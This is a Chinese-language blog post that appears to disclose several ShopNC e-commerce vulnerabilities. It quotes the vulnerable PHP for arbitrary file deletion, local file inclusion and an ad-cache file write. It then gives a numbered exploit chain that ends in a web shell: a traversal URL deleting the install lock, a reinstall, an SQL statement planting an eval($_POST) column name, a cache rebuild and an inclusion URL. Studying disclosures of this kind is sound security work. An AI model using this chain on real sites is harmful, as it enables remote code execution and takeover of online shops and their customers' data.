ShopNC多个漏洞(可暴力 getshell)

前言
ShopNC是一款S是网城创想公司旗下服务于企业客户的电子商务系统,基于PHP5技术采用MVC 模式开发,本文介绍了shopnc多个漏洞结合,可getshell有点暴力-_-

任意文件删除

文件 control\store.php 1438 行 (还有几个同样的地方)
[php]
........
$model_upload = Model('upload');
$file_info = $model_upload->getOneUpload(intval($_GET['file_id']));
if(!$file_info){
@unlink(ATTACH_SLIDE.DS.$_GET['img_src']);
}else{

........[/php]
本地文件包含
文件 /framework/core/base.php 71行
[php]
$act_file = realpath( BasePath.DS."control".DS.$_GET['act'].".php" );
}
if ( is_file( $act_file ) )
{
require( $act_file );
$class_name = $_GET['act']."Control";
if ( class_exists( $class_name ) )[/php]
后台更新缓存写shell
文件 model/adv_model.php 416 行
[php]
/**
* 更新一条广告缓存
*
* @param unknown_type $adv
* @return unknown
*/
public function makeAdvCache($adv){
$lang = Language::getLangContent();
$tmp .= " $tmp .= "defined('InShopNC') or exit('Access Invalid!'); \r\n";
if (is_numeric($adv) && $adv > 0){

$condition['adv_id'] = $adv;
$adv_info = $this->getList($condition);
$adv = $adv_info['0'];
}
..................................
$content = addslashes($v);
$cache_file = BasePath.'/cache/adv/adv_'.$adv['adv_id'].'.cache.php';
file_put_contents($cache_file,$tmp);
[/php]
继续跟进getList函数
[php]
public function getList($condition=array(), $page='', $limit='', $orderby=''){
$param = array();
$param['table'] = 'adv';
$param['field'] = $condition['field']?$condition['field']:'*';
$param['where'] = $this->getCondition($condition);
if($orderby == ''){
$param['order'] = 'slide_sort, adv_id desc';
}else{
$param['order'] = $orderby;
}
$param['limit'] = $limit;
return Db::select($param,$page);
}
[/php]
写文件时,从数据库中遍历key,跟value 未过滤key,key 可以从数据库读取,当有数据库可控时,即可写入任意文件.

ShopNc GetShell

结合以上三个漏洞,即可优雅的 getshell
任意文件删除 => 重装 => 更改数据库 shopnc_adv 键值 =>更新广告缓存 =>getshell

具体步骤

1:[php]http://0day5.com/index.php?act=store&op=dorp_img&file_id=16&img_src=/../../../install/lock[/php]
2:重装系统
3:进入MySQL 执行[php]sql ALTER TABLE `shopnc_adv` ADD `{eval($_POST[1])}` VARCHAR( 100 ) NOT NULL [/php]
4:进入后台 更新广告缓存 [php] http://0day5.com/admin/index.php?act=adv&op=adv_edit&adv_id=14[/php]
5:连接shell [php]http://0day5.com/index.php?act=../cache/adv/adv_14.cache[/php]

Author:Yaseng

发表评论